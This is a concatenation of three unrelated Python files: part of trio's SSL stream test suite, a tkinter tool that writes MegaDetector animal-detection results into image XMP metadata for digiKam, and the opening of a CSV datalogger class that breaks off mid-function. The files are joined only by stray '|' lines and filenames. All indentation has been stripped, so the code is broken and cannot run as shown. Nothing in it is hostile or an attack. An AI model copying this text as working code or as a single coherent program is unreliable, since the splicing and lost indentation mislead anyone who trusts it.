await trio.sleep(1000)
await s.wait_send_all_might_not_block()
with virtual_ssl_echo_server(sleeper=sleeper_with_slow_send_all) as s:
await send(b"x")
s.transport_stream.renegotiate()
async with _core.open_nursery() as nursery:
nursery.start_soon(expect, b"x")
nursery.start_soon(sleep_then_wait_writable)
await clear()
await s.aclose()
# 2) Same, but now wait_send_all_might_not_block is stuck when
# receive_some tries to send.
async def sleeper_with_slow_wait_writable_and_expect(method):
if method == "wait_send_all_might_not_block":
await trio.sleep(100000)
elif method == "expect":
await trio.sleep(1000)
with virtual_ssl_echo_server(
sleeper=sleeper_with_slow_wait_writable_and_expect
) as s:
await send(b"x")
s.transport_stream.renegotiate()
async with _core.open_nursery() as nursery:
nursery.start_soon(expect, b"x")
nursery.start_soon(s.wait_send_all_might_not_block)
await clear()
await s.aclose()
async def test_resource_busy_errors():
async def do_send_all():
with assert_checkpoints():
await s.send_all(b"x")
async def do_receive_some():
with assert_checkpoints():
await s.receive_some(1)
async def do_wait_send_all_might_not_block():
with assert_checkpoints():
await s.wait_send_all_might_not_block()
s, _ = ssl_lockstep_stream_pair()
with pytest.raises(_core.BusyResourceError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(do_send_all)
nursery.start_soon(do_send_all)
assert "another task" in str(excinfo.value)
s, _ = ssl_lockstep_stream_pair()
with pytest.raises(_core.BusyResourceError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(do_receive_some)
nursery.start_soon(do_receive_some)
assert "another task" in str(excinfo.value)
s, _ = ssl_lockstep_stream_pair()
with pytest.raises(_core.BusyResourceError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(do_send_all)
nursery.start_soon(do_wait_send_all_might_not_block)
assert "another task" in str(excinfo.value)
s, _ = ssl_lockstep_stream_pair()
with pytest.raises(_core.BusyResourceError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(do_wait_send_all_might_not_block)
nursery.start_soon(do_wait_send_all_might_not_block)
assert "another task" in str(excinfo.value)
async def test_wait_writable_calls_underlying_wait_writable():
record = []
class NotAStream:
async def wait_send_all_might_not_block(self):
record.append("ok")
ctx = ssl.create_default_context()
s = SSLStream(NotAStream(), ctx, server_hostname="x")
await s.wait_send_all_might_not_block()
assert record == ["ok"]
async def test_checkpoints():
async with ssl_echo_server() as s:
with assert_checkpoints():
await s.do_handshake()
with assert_checkpoints():
await s.do_handshake()
with assert_checkpoints():
await s.wait_send_all_might_not_block()
with assert_checkpoints():
await s.send_all(b"xxx")
with assert_checkpoints():
await s.receive_some(1)
# These receive_some's in theory could return immediately, because the
# "xxx" was sent in a single record and after the first
# receive_some(1) the rest are sitting inside the SSLObject's internal
# buffers.
with assert_checkpoints():
await s.receive_some(1)
with assert_checkpoints():
await s.receive_some(1)
with assert_checkpoints():
await s.unwrap()
async with ssl_echo_server() as s:
await s.do_handshake()
with assert_checkpoints():
await s.aclose()
async def test_send_all_empty_string():
async with ssl_echo_server() as s:
await s.do_handshake()
# underlying SSLObject interprets writing b"" as indicating an EOF,
# for some reason. Make sure we don't inherit this.
with assert_checkpoints():
await s.send_all(b"")
with assert_checkpoints():
await s.send_all(b"")
await s.send_all(b"x")
assert await s.receive_some(1) == b"x"
await s.aclose()
@pytest.mark.parametrize("https_compatible", [False, True])
async def test_SSLStream_generic(https_compatible):
async def stream_maker():
return ssl_memory_stream_pair(
client_kwargs={"https_compatible": https_compatible},
server_kwargs={"https_compatible": https_compatible},
)
async def clogged_stream_maker():
client, server = ssl_lockstep_stream_pair()
# If we don't do handshakes up front, then we run into a problem in
# the following situation:
# - server does wait_send_all_might_not_block
# - client does receive_some to unclog it
# Then the client's receive_some will actually send some data to start
# the handshake, and itself get stuck.
async with _core.open_nursery() as nursery:
nursery.start_soon(client.do_handshake)
nursery.start_soon(server.do_handshake)
return client, server
await check_two_way_stream(stream_maker, clogged_stream_maker)
async def test_unwrap():
client_ssl, server_ssl = ssl_memory_stream_pair()
client_transport = client_ssl.transport_stream
server_transport = server_ssl.transport_stream
seq = Sequencer()
async def client():
await client_ssl.do_handshake()
await client_ssl.send_all(b"x")
assert await client_ssl.receive_some(1) == b"y"
await client_ssl.send_all(b"z")
# After sending that, disable outgoing data from our end, to make
# sure the server doesn't see our EOF until after we've sent some
# trailing data
async with seq(0):
send_all_hook = client_transport.send_stream.send_all_hook
client_transport.send_stream.send_all_hook = None
assert await client_ssl.receive_some(1) == b""
assert client_ssl.transport_stream is client_transport
# We just received EOF. Unwrap the connection and send some more.
raw, trailing = await client_ssl.unwrap()
assert raw is client_transport
assert trailing == b""
assert client_ssl.transport_stream is None
await raw.send_all(b"trailing")
# Reconnect the streams. Now the server will receive both our shutdown
# acknowledgement + the trailing data in a single lump.
client_transport.send_stream.send_all_hook = send_all_hook
await client_transport.send_stream.send_all_hook()
async def server():
await server_ssl.do_handshake()
assert await server_ssl.receive_some(1) == b"x"
await server_ssl.send_all(b"y")
assert await server_ssl.receive_some(1) == b"z"
# Now client is blocked waiting for us to send something, but
# instead we close the TLS connection (with sequencer to make sure
# that the client won't see and automatically respond before we've had
# a chance to disable the client->server transport)
async with seq(1):
raw, trailing = await server_ssl.unwrap()
assert raw is server_transport
assert trailing == b"trailing"
assert server_ssl.transport_stream is None
async with _core.open_nursery() as nursery:
nursery.start_soon(client)
nursery.start_soon(server)
async def test_closing_nice_case():
# the nice case: graceful closes all around
client_ssl, server_ssl = ssl_memory_stream_pair()
client_transport = client_ssl.transport_stream
# Both the handshake and the close require back-and-forth discussion, so
# we need to run them concurrently
async def client_closer():
with assert_checkpoints():
await client_ssl.aclose()
async def server_closer():
assert await server_ssl.receive_some(10) == b""
assert await server_ssl.receive_some(10) == b""
with assert_checkpoints():
await server_ssl.aclose()
async with _core.open_nursery() as nursery:
nursery.start_soon(client_closer)
nursery.start_soon(server_closer)
# closing the SSLStream also closes its transport
with pytest.raises(ClosedResourceError):
await client_transport.send_all(b"123")
# once closed, it's OK to close again
with assert_checkpoints():
await client_ssl.aclose()
with assert_checkpoints():
await client_ssl.aclose()
# Trying to send more data does not work
with pytest.raises(ClosedResourceError):
await server_ssl.send_all(b"123")
# And once the connection is has been closed *locally*, then instead of
# getting empty bytestrings we get a proper error
with pytest.raises(ClosedResourceError):
await client_ssl.receive_some(10) == b""
with pytest.raises(ClosedResourceError):
await client_ssl.unwrap()
with pytest.raises(ClosedResourceError):
await client_ssl.do_handshake()
# Check that a graceful close *before* handshaking gives a clean EOF on
# the other side
client_ssl, server_ssl = ssl_memory_stream_pair()
async def expect_eof_server():
with assert_checkpoints():
assert await server_ssl.receive_some(10) == b""
with assert_checkpoints():
await server_ssl.aclose()
async with _core.open_nursery() as nursery:
nursery.start_soon(client_ssl.aclose)
nursery.start_soon(expect_eof_server)
async def test_send_all_fails_in_the_middle():
client, server = ssl_memory_stream_pair()
async with _core.open_nursery() as nursery:
nursery.start_soon(client.do_handshake)
nursery.start_soon(server.do_handshake)
async def bad_hook():
raise KeyError
client.transport_stream.send_stream.send_all_hook = bad_hook
with pytest.raises(KeyError):
await client.send_all(b"x")
with pytest.raises(BrokenResourceError):
await client.wait_send_all_might_not_block()
closed = 0
def close_hook():
nonlocal closed
closed += 1
client.transport_stream.send_stream.close_hook = close_hook
client.transport_stream.receive_stream.close_hook = close_hook
await client.aclose()
assert closed == 2
async def test_ssl_over_ssl():
client_0, server_0 = memory_stream_pair()
client_1 = SSLStream(
client_0, CLIENT_CTX, server_hostname="trio-test-1.example.org"
)
server_1 = SSLStream(server_0, SERVER_CTX, server_side=True)
client_2 = SSLStream(
client_1, CLIENT_CTX, server_hostname="trio-test-1.example.org"
)
server_2 = SSLStream(server_1, SERVER_CTX, server_side=True)
async def client():
await client_2.send_all(b"hi")
assert await client_2.receive_some(10) == b"bye"
async def server():
assert await server_2.receive_some(10) == b"hi"
await server_2.send_all(b"bye")
async with _core.open_nursery() as nursery:
nursery.start_soon(client)
nursery.start_soon(server)
async def test_ssl_bad_shutdown():
client, server = ssl_memory_stream_pair()
async with _core.open_nursery() as nursery:
nursery.start_soon(client.do_handshake)
nursery.start_soon(server.do_handshake)
await trio.aclose_forcefully(client)
# now the server sees a broken stream
with pytest.raises(BrokenResourceError):
await server.receive_some(10)
with pytest.raises(BrokenResourceError):
await server.send_all(b"x" * 10)
await server.aclose()
async def test_ssl_bad_shutdown_but_its_ok():
client, server = ssl_memory_stream_pair(
server_kwargs={"https_compatible": True},
client_kwargs={"https_compatible": True}
)
async with _core.open_nursery() as nursery:
nursery.start_soon(client.do_handshake)
nursery.start_soon(server.do_handshake)
await trio.aclose_forcefully(client)
# the server sees that as a clean shutdown
assert await server.receive_some(10) == b""
with pytest.raises(BrokenResourceError):
await server.send_all(b"x" * 10)
await server.aclose()
async def test_ssl_handshake_failure_during_aclose():
# Weird scenario: aclose() triggers an automatic handshake, and this
# fails. This also exercises a bit of code in aclose() that was otherwise
# uncovered, for re-raising exceptions after calling aclose_forcefully on
# the underlying transport.
async with ssl_echo_server_raw(expect_fail=True) as sock:
# Don't configure trust correctly
client_ctx = ssl.create_default_context()
s = SSLStream(
sock, client_ctx, server_hostname="trio-test-1.example.org"
)
# It's a little unclear here whether aclose should swallow the error
# or let it escape. We *do* swallow the error if it arrives when we're
# sending close_notify, because both sides closing the connection
# simultaneously is allowed. But I guess when https_compatible=False
# then it's bad if we can get through a whole connection with a peer
# that has no valid certificate, and never raise an error.
with pytest.raises(BrokenResourceError):
await s.aclose()
async def test_ssl_only_closes_stream_once():
# We used to have a bug where if transport_stream.aclose() raised an
# error, we would call it again. This checks that that's fixed.
client, server = ssl_memory_stream_pair()
async with _core.open_nursery() as nursery:
nursery.start_soon(client.do_handshake)
nursery.start_soon(server.do_handshake)
client_orig_close_hook = client.transport_stream.send_stream.close_hook
transport_close_count = 0
def close_hook():
nonlocal transport_close_count
client_orig_close_hook()
transport_close_count += 1
raise KeyError
client.transport_stream.send_stream.close_hook = close_hook
with pytest.raises(KeyError):
await client.aclose()
assert transport_close_count == 1
async def test_ssl_https_compatibility_disagreement():
client, server = ssl_memory_stream_pair(
server_kwargs={"https_compatible": False},
client_kwargs={"https_compatible": True}
)
async with _core.open_nursery() as nursery:
nursery.start_soon(client.do_handshake)
nursery.start_soon(server.do_handshake)
# client is in HTTPS-mode, server is not
# so client doing graceful_shutdown causes an error on server
async def receive_and_expect_error():
with pytest.raises(BrokenResourceError) as excinfo:
await server.receive_some(10)
assert isinstance(excinfo.value.__cause__, ssl.SSLEOFError)
async with _core.open_nursery() as nursery:
nursery.start_soon(client.aclose)
nursery.start_soon(receive_and_expect_error)
async def test_https_mode_eof_before_handshake():
client, server = ssl_memory_stream_pair(
server_kwargs={"https_compatible": True},
client_kwargs={"https_compatible": True}
)
async def server_expect_clean_eof():
assert await server.receive_some(10) == b""
async with _core.open_nursery() as nursery:
nursery.start_soon(client.aclose)
nursery.start_soon(server_expect_clean_eof)
async def test_send_error_during_handshake():
client, server = ssl_memory_stream_pair()
async def bad_hook():
raise KeyError
client.transport_stream.send_stream.send_all_hook = bad_hook
with pytest.raises(KeyError):
with assert_checkpoints():
await client.do_handshake()
with pytest.raises(BrokenResourceError):
with assert_checkpoints():
await client.do_handshake()
async def test_receive_error_during_handshake():
client, server = ssl_memory_stream_pair()
async def bad_hook():
raise KeyError
client.transport_stream.receive_stream.receive_some_hook = bad_hook
async def client_side(cancel_scope):
with pytest.raises(KeyError):
with assert_checkpoints():
await client.do_handshake()
cancel_scope.cancel()
async with _core.open_nursery() as nursery:
nursery.start_soon(client_side, nursery.cancel_scope)
nursery.start_soon(server.do_handshake)
with pytest.raises(BrokenResourceError):
with assert_checkpoints():
await client.do_handshake()
async def test_selected_alpn_protocol_before_handshake():
client, server = ssl_memory_stream_pair()
with pytest.raises(NeedHandshakeError):
client.selected_alpn_protocol()
with pytest.raises(NeedHandshakeError):
server.selected_alpn_protocol()
async def test_selected_alpn_protocol_when_not_set():
# ALPN protocol still returns None when it's not ser,
# instead of raising an exception
client, server = ssl_memory_stream_pair()
async with _core.open_nursery() as nursery:
nursery.start_soon(client.do_handshake)
nursery.start_soon(server.do_handshake)
assert client.selected_alpn_protocol() is None
assert server.selected_alpn_protocol() is None
assert client.selected_alpn_protocol() == \
server.selected_alpn_protocol()
async def test_selected_npn_protocol_before_handshake():
client, server = ssl_memory_stream_pair()
with pytest.raises(NeedHandshakeError):
client.selected_npn_protocol()
with pytest.raises(NeedHandshakeError):
server.selected_npn_protocol()
async def test_selected_npn_protocol_when_not_set():
# NPN protocol still returns None when it's not ser,
# instead of raising an exception
client, server = ssl_memory_stream_pair()
async with _core.open_nursery() as nursery:
nursery.start_soon(client.do_handshake)
nursery.start_soon(server.do_handshake)
assert client.selected_npn_protocol() is None
assert server.selected_npn_protocol() is None
assert client.selected_npn_protocol() == \
server.selected_npn_protocol()
async def test_get_channel_binding_before_handshake():
client, server = ssl_memory_stream_pair()
with pytest.raises(NeedHandshakeError):
client.get_channel_binding()
with pytest.raises(NeedHandshakeError):
server.get_channel_binding()
async def test_get_channel_binding_after_handshake():
client, server = ssl_memory_stream_pair()
async with _core.open_nursery() as nursery:
nursery.start_soon(client.do_handshake)
nursery.start_soon(server.do_handshake)
assert client.get_channel_binding() is not None
assert server.get_channel_binding() is not None
assert client.get_channel_binding() == \
server.get_channel_binding()
async def test_getpeercert():
# Make sure we're not affected by https://bugs.python.org/issue29334
client, server = ssl_memory_stream_pair()
async with _core.open_nursery() as nursery:
nursery.start_soon(client.do_handshake)
nursery.start_soon(server.do_handshake)
assert server.getpeercert() is None
print(client.getpeercert())
assert (
("DNS",
"trio-test-1.example.org") in client.getpeercert()["subjectAltName"]
)
async def test_SSLListener():
async def setup(**kwargs):
listen_sock = tsocket.socket()
await listen_sock.bind(("127.0.0.1", 0))
listen_sock.listen(1)
socket_listener = SocketListener(listen_sock)
ssl_listener = SSLListener(socket_listener, SERVER_CTX, **kwargs)
transport_client = await open_tcp_stream(*listen_sock.getsockname())
ssl_client = SSLStream(
transport_client,
CLIENT_CTX,
server_hostname="trio-test-1.example.org"
)
return listen_sock, ssl_listener, ssl_client
listen_sock, ssl_listener, ssl_client = await setup()
async with ssl_client:
ssl_server = await ssl_listener.accept()
async with ssl_server:
assert not ssl_server._https_compatible
# Make sure the connection works
async with _core.open_nursery() as nursery:
nursery.start_soon(ssl_client.do_handshake)
nursery.start_soon(ssl_server.do_handshake)
# Test SSLListener.aclose
await ssl_listener.aclose()
assert listen_sock.fileno() == -1
################
# Test https_compatible
_, ssl_listener, ssl_client = await setup(https_compatible=True)
ssl_server = await ssl_listener.accept()
assert ssl_server._https_compatible
await aclose_forcefully(ssl_listener)
await aclose_forcefully(ssl_client)
await aclose_forcefully(ssl_server)
async def test_deprecated_max_refill_bytes():
stream1, stream2 = memory_stream_pair()
with pytest.warns(trio.TrioDeprecationWarning):
SSLStream(stream1, CLIENT_CTX, max_refill_bytes=100)
with pytest.warns(trio.TrioDeprecationWarning):
# passing None is wrong here, but I'm too lazy to make a fake Listener
# and we get away with it for now. And this test will be deleted in a
# release or two anyway, so hopefully we'll keep getting away with it
# for long enough.
SSLListener(None, CLIENT_CTX, max_refill_bytes=100)
|
xmp_integration.py
|
#
# xmp_integration.py
#
# Tools for loading MegaDetector batch API results into XMP metadata, specifically
# for consumption in digiKam:
#
# https://cran.r-project.org/web/packages/camtrapR/vignettes/camtrapr2.html
#
#%% Imports and constants
import argparse
import tkinter
from tkinter import ttk, messagebox, filedialog
import inspect
import os
import sys
import json
import pyexiv2
import ntpath
import threading
import traceback
from tqdm import tqdm
from multiprocessing import Pool
from multiprocessing.pool import ThreadPool
from functools import partial
category_mapping = {'person': 'Human', 'animal': 'Animal', 'vehicle': 'Vehicle'}
#%% Class definitions
class xmp_gui:
root = None
textarea_min_threshold = None
textarea_status = None
textarea_remove_path = None
textarea_rename_conf = None
textarea_rename_cats = None
num_threads = 1
class xmp_integration_options:
# Folder where images are stored
image_folder = None
# .json file containing MegaDetector output
input_file = None
# String to remove from all path names, typically representing a
# prefix that was added during MegaDetector processing
remove_path = None
# Optionally *rename* (not copy) all images that have no detections
# above [rename_conf] for the categories in rename_cats from x.jpg to
# x.check.jpg
rename_conf = None
# Comma-deleted list of category names (or "all") to apply the rename_conf
# behavior to.
rename_cats = None
# Minimum detection threshold (applies to all classes, defaults to None,
# i.e. 0.0
min_threshold = None
num_threads = 1
xmp_gui = None
#%% Functions
def write_status(options,s):
if options.xmp_gui is None:
return
options.xmp_gui.textarea_status.configure(state="normal")
options.xmp_gui.textarea_status.insert(tkinter.END, s + '\n')
options.xmp_gui.textarea_status.configure(state="disabled")
n_images_processed = 0
def update_xmp_metadata(categories, options, rename_cats, n_images, image):
"""
Update the XMP metadata for a single image
"""
# Relative image path
filename = ''
# Absolute image path
img_path = ''
global n_images_processed
try:
filename = image['file']
if options.remove_path != None and len(options.remove_path) > 0:
filename = filename.replace(options.remove_path, '')
img_path = os.path.join(options.image_folder, filename)
assert os.path.isfile(img_path), 'Image {} not found'.format(img_path)
# List of categories to write to XMP metadata
image_categories = []
# Categories with above-threshold detections present for
# this image
original_image_cats = []
# Maximum confidence for each category
original_image_cats_conf = {}
for detection in image['detections']:
cat = category_mapping[categories[detection['category']]]
# Have we already added this to the list of categories to
# write out to this image?
if cat not in image_categories:
# If we're supposed to compare to a threshold...
if len(options.min_threshold) > 0 and \
options.min_threshold != None:
if float(detection['conf']) > float(options.min_threshold):
image_categories.append(cat)
original_image_cats.append(
categories[detection['category']])
# Else we treat *any* detection as valid...
else:
image_categories.append(cat)
original_image_cats.append(categories[detection['category']])
# Keep track of the highest-confidence detection for this class
if options.min_threshold != None and \
len(options.min_threshold) > 0 and \
detection['conf'] > \
original_image_cats_conf.get(
categories[detection['category']], 0):
original_image_cats_conf[categories[detection['category']]] = \
detection['conf']
img = pyexiv2.Image(r'{0}'.format(img_path))
img.modify_xmp({'Xmp.lr.hierarchicalSubject': image_categories})
# If we're doing the rename/.check behavior...
if not (options.rename_conf is None and options.rename_cats is None):
matching_cats = set(rename_cats).intersection(set(original_image_cats))
is_conf_low = False
if options.min_threshold != None and len(options.min_threshold) > 0:
for matching_cat in matching_cats:
if original_image_cats_conf[matching_cat] < float(options.rename_conf):
is_conf_low = True
if options.min_threshold != None and \
len(options.min_threshold) > 0 and \
len(image['detections']) == 0 or \
(len(options.rename_conf) > 0 and \
is_conf_low is True and \
len(matching_cats) > 0):
parent_folder = os.path.dirname(img_path)
file_name = ntpath.basename(img_path)
manual_file_name = file_name.split('.')[0]+'_check' + '.' + file_name.split('.')[1]
os.rename(img_path, os.path.join(parent_folder, manual_file_name))
if options.xmp_gui is not None:
n_images_processed += 1
percentage = round((n_images_processed)/n_images*100)
options.xmp_gui.progress_bar['value'] = percentage
options.xmp_gui.root.update_idletasks()
options.xmp_gui.style.configure('text.Horizontal.Tprogress_bar',
text='{:g} %'.format(percentage))
except Exception as e:
s = 'Error processing image {}: {}'.format(filename,str(e))
print(s)
traceback.print_exc()
write_status(options,s)
if False:
# Legacy code to rename files where XMP writing failed
parent_folder = os.path.dirname(img_path)
file_name = ntpath.basename(img_path)
failed_file_name = file_name.split('.')[0]+'_failed' + '.' + file_name.split('.')[1]
os.rename(img_path, os.path.join(
parent_folder, failed_file_name))
def process_input_data(options):
"""
Main function to loop over images and modify XMP data
"""
if options.xmp_gui is not None:
if (options.image_folder is None) or (len(options.image_folder) == 0):
tkinter.messagebox.showerror(title='Error', message='Image folder is not selected')
sys.exit()
if (options.input_file is None) or (len(options.input_file) == 0):
tkinter.messagebox.showerror(
title='Error', message='No MegaDetector .json file selected')
sys.exit()
options.remove_path = options.xmp_gui.textarea_remove_path.get()
options.rename_conf = options.xmp_gui.textarea_rename_conf.get()
options.rename_cats = options.xmp_gui.textarea_rename_cats.get()
options.num_threads = options.xmp_gui.textarea_num_threads.get()
options.min_threshold = options.xmp_gui.textarea_min_threshold.get()
try:
with open(options.input_file, 'r') as f:
data = f.read()
data = json.loads(data)
categories = data['detection_categories']
images = data['images']
n_images = len(images)
if not (options.rename_conf is None and options.rename_cats is None):
rename_cats = options.rename_cats.split(",")
if rename_cats[0] == 'all':
rename_cats = list(category_mapping.keys())
else:
rename_cats = []
if len(options.num_threads) > 0:
num_threads = int(options.num_threads)
else:
num_threads = 1
print(num_threads)
if options.xmp_gui is None:
func = partial(update_xmp_metadata, categories, options, rename_cats, n_images)
with Pool(num_threads) as p:
with tqdm(total=n_images) as pbar:
for i, _ in enumerate(p.imap_unordered(func, images)):
pbar.update()
else:
func = partial(update_xmp_metadata, categories, options, rename_cats, n_images)
with ThreadPool(num_threads) as p:
p.map(func, images)
s = 'Successfully processed {} images'.format(n_images)
print(s)
write_status(options,s)
except Exception as e:
print('Error processing input data: {}'.format(str(e)))
traceback.print_exc()
if options.xmp_gui is not None:
tkinter.messagebox.showerror(title='Error',
message='Make Sure you selected the proper image folder and JSON files')
sys.exit()
def start_input_processing(options):
t = threading.Thread(target=lambda: process_input_data(options))
t.start()
def browse_folder(options,folder_path_var):
filename = tkinter.filedialog.askdirectory()
options.image_folder = r'{0}'.format(filename)
folder_path_var.set(filename)
def browse_file(options,file_path_var):
filename = tkinter.filedialog.askopenfilename()
options.input_file = r'{0}'.format(filename)
file_path_var.set(filename)
def create_gui(options):
root = tkinter.Tk()
root.resizable(False, False)
root.configure(background='white')
root.title('DigiKam Integration')
group = tkinter.LabelFrame(root, padx=5, pady=5)
group.configure(background = 'white')
group.pack(padx=10, pady=10, fill='both', expand='yes')
canvas = tkinter.Canvas(group, width = 800, height = 150)
canvas.configure(background = 'white')
canvas.pack()
img1 = tkinter.PhotoImage(file='images/aiforearth.png')
canvas.create_image(0,0, anchor=tkinter.NW, image=img1)
img2 = tkinter.PhotoImage(file='images/bg.png')
canvas.create_image(0,20, anchor=tkinter.NW, image=img2)
frame = tkinter.Frame(root)
frame.configure(background='white')
frame.pack()
l1 = tkinter.Label(frame, text='Folder containing images')
l1.configure(background='white')
l1.grid(row=0, column=0)
folder_path_var = tkinter.StringVar()
e1 = tkinter.Entry(frame, width=50, textvariable=folder_path_var, highlightthickness=1)
e1.configure(highlightbackground='grey', highlightcolor='grey')
e1.grid(row=0, column=2)
b1 = tkinter.Button(frame, text='Browse', fg='blue', command=lambda: browse_folder(options,folder_path_var))
b1.grid(row=0, column=5, padx=10)
l2 = tkinter.Label(frame, text='Path to MegaDetector output .json file')
l2.configure(background='white')
l2.grid(row=1, column=0)
file_path_var = tkinter.StringVar()
e2 = tkinter.Entry(frame, width=50, textvariable=file_path_var, highlightthickness=1)
e2.configure(highlightbackground='grey', highlightcolor='grey')
e2.grid(row=1, column=2)
b2 = tkinter.Button(frame, text='Browse', fg='blue', command=lambda: browse_file(options,file_path_var))
b2.grid(row=1, column=5, padx=10)
l6 = tkinter.Label(frame, text='Minimum confidence to consider a category')
l6.configure(background='white')
l6.grid(row=2, column=0)
textarea_min_threshold = tkinter.Entry(frame, width=50, highlightthickness=1)
textarea_min_threshold.configure(highlightbackground='grey', highlightcolor='grey')
textarea_min_threshold.grid(row=2, column=2)
l3 = tkinter.Label(frame, text='Prefix to remove from image paths (optional)')
l3.configure(background='white')
l3.grid(row=3, column=0)
textarea_remove_path = tkinter.Entry(frame, width=50, highlightthickness=1)
textarea_remove_path.configure(highlightbackground='grey', highlightcolor='grey')
textarea_remove_path.grid(row=3, column=2)
l4 = tkinter.Label(frame, text='Confidence level to move images requires manual check (optional)')
l4.configure(background='white')
l4.grid(row=4, column=0)
textarea_rename_conf = tkinter.Entry(frame, width=50, highlightthickness=1)
textarea_rename_conf.configure(highlightbackground='grey', highlightcolor='grey')
textarea_rename_conf.grid(row=4, column=2)
l5 = tkinter.Label(frame, text='Categories to check for the confidence (optional)')
l5.configure(background='white')
l5.grid(row=5, column=0)
textarea_rename_cats = tkinter.Entry(frame, width=50, highlightthickness=1)
textarea_rename_cats.configure(highlightbackground='grey', highlightcolor='grey')
textarea_rename_cats.grid(row=5, column=2)
l6 = tkinter.Label(frame, text='Number of threads to run (optional)')
l6.configure(background='white')
l6.grid(row=6, column=0)
textarea_num_threads = tkinter.Entry(frame, width=50, highlightthickness=1)
textarea_num_threads.configure(highlightbackground='grey', highlightcolor='grey')
textarea_num_threads.grid(row=6, column=2)
sb = tkinter.Button(frame, text='Submit', fg='black',
command=lambda: start_input_processing(options), padx=10)
sb.grid(row=7, column=2, padx=10, pady=10)
style = tkinter.ttk.Style(root)
style.layout('text.Horizontal.Tprogress_bar',
[('Horizontal.progress_bar.trough',
{'children': [('Horizontal.progress_bar.pbar',
{'side': 'left', 'sticky': 'ns'})],
'sticky': 'nswe'}),
('Horizontal.progress_bar.label', {'sticky': ''})])
style.configure('text.Horizontal.Tprogress_bar', text='0 %')
progress_bar = tkinter.ttk.Progressbar(root, style='text.Horizontal.Tprogress_bar', length=700,
maximum=100, value=0, mode='determinate')
progress_bar.pack(pady=10)
group2 = tkinter.LabelFrame(root, text='Status', padx=5, pady=5)
group2.pack(padx=10, pady=10, fill='both', expand='yes')
textarea_status = tkinter.Text(group2, height=10, width=100)
textarea_status.configure(state="disabled")
textarea_status.pack()
options.xmp_gui = xmp_gui()
options.xmp_gui.root = root
options.xmp_gui.textarea_min_threshold = textarea_min_threshold
options.xmp_gui.textarea_remove_path = textarea_remove_path
options.xmp_gui.textarea_rename_conf = textarea_rename_conf
options.xmp_gui.textarea_rename_cats = textarea_rename_cats
options.xmp_gui.textarea_num_threads = textarea_num_threads
options.xmp_gui.textarea_status = textarea_status
options.xmp_gui.progress_bar = progress_bar
options.xmp_gui.style = style
root.mainloop()
#%% Interactive/test driver
if False:
#%%
options = xmp_integration_options()
options.input_file = r"C:\temp\demo_images\ssmini_xmp_test_orig\ssmini.mdv4.json"
options.image_folder = r"C:\temp\demo_images\ssmini_xmp_test"
options.remove_path = 'my_images/'
process_input_data(options)
#%% Command-line driver
def args_to_object(args,obj):
"""
Copy all fields from the argparse table "args" to the object "obj"
"""
for n, v in inspect.getmembers(args):
if not n.startswith('_'):
setattr(obj, n, v)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--input_file', help = 'Path to the MegaDetector .json file', default=None)
parser.add_argument('--image_folder', help = 'Path to the folder containing images', default=None)
parser.add_argument('--min_threshold', help = 'Minimum detection confidence that will be treated as a detection event', default=None)
parser.add_argument('--remove_path', help = 'Prefix to remove from image paths in the .json file', default=None)
parser.add_argument('--rename_conf', help = 'Below this confidence level, images will be renamed for manual check', default=None)
parser.add_argument('--rename_cat', help = 'Category (or comma-delimited categories) to apply renaming behavior to', default=None)
parser.add_argument('--num_threads', help = 'Number of threads to use for image processing', default=1)
parser.add_argument('--gui', help = 'Run in GUI mode', action='store_true')
options = xmp_integration_options()
args = parser.parse_args()
args_to_object(args,options)
if options.gui:
assert options.input_file is None, 'Command-line argument specified in GUI mode'
assert options.image_folder is None, 'Command-line argument specified in GUI mode'
assert options.min_threshold is None, 'Command-line argument specified in GUI mode'
assert options.remove_path is None, 'Command-line argument specified in GUI mode'
assert options.rename_conf is None, 'Command-line argument specified in GUI mode'
assert options.rename_cat is None, 'Command-line argument specified in GUI mode'
assert options.num_threads == 1, 'Command-line argument specified in GUI mode'
create_gui(options)
else:
process_input_data(options)
if __name__ == '__main__':
main()
|
datalogger.py
|
'''
Created on Oct 6, 2018
@author: Vinu Karthek
'''
import os, datetime, threading
from classes import tkinter_app
import logging
try:
import tkinter as tk # Python 3.x
import tkinter.scrolledtext as ScrolledText
except ImportError:
import Tkinter as tk # Python 2.x
import ScrolledText
class datalogger():
'''
Generic Datalogger Class
'''
def __init__(self, datalog_path):
#Initialize the class with Datalog file path
self.max_file_size = 0
#Check if datalog path is a file or a directory
if not os.path.isdir(datalog_path):
self.datalog_filepath = datalog_path #If datalog_path is file assign it to datalog_filepath variable
self.datalog_dir = os.path.split(self.datalog_filepath)[0] #Extract datalog directory from datalog filepath
self.check_if_folder_exists(self.datalog_dir) #Create datalog directory if it doesn't exists
else:
self.datalog_dir = datalog_path
self.check_if_folder_exists(self.datalog_dir) #Create datalog directory if it doesn't exists
self.datalog_filepath = os.path.join(self.datalog_dir,('log_'+self.get_time()+".csv"))
print(self.get_time())
self.init()
return
def check_if_folder_exists(self,folder_path):
if not os.path.exists(folder_path):
os.makedirs(folder_path)
return
def get_file_size(self):
#Get Datalog File size in Bytes
return os.path.getsize(self.datalog_filepath)
def get_time(self):
#Returns Timestamp in MM-DD-YYYY-HH.MM format
now = datetime.datetime.now()
return str(now.strftime("%m-%d-%Y-%H.%M.%S"))
def get_log(self, length):
#Returns N lines from Datalog, where N is Specified by Variable 'length'
line = self.datalog_fileref.readlines()
return line
def set_log(self, category, sub_category, log_string):
#Logs the incoming entires (Category, Subcategory, String) with timestamp
#Category = self.calss_name = self.__class__.__name__
#Subcategory = inspect.getframeinfo(inspect.currentframe()).function
timestamp = self.get_time()
line = category + ',' + sub_category + ',' + log_string + "," + timestamp +'\n'
self.open()
self.datalog_fileref.writelines(line)
self.close()
logging.info(line)
return
def log_execution_time(self):
#Returns the execution time on the module for logging
return
def worker(self):
self.worker_root = tk.Tk()
myGUI(self.worker_root)
self.worker_root.mainloop()
return
def destroy_debugconsole(self):
self.worker_root.destroy()
def init(self):
if (os.stat(self.datalog_filepath).st_size==0):
line = 'category' + ',' + 'sub_category' + ',' + 'log_string' + "," + 'timestamp' +'\n'
self.open()
self.datalog_fileref.writelines(line)
self.close()
threading.Thread(target=self.worker, args=[]).start()
return
def open(self):
self.datalog_fileref = open(self.datalog_filepath,'a+')
return
def close(self):
self.datalog_fileref.close()
return
def show_logger(self):
#Separate thread to display & use queue to refresh datalog
logger_gui = tkinter_app.tkinter_app()
window_title = 'Datalogger'
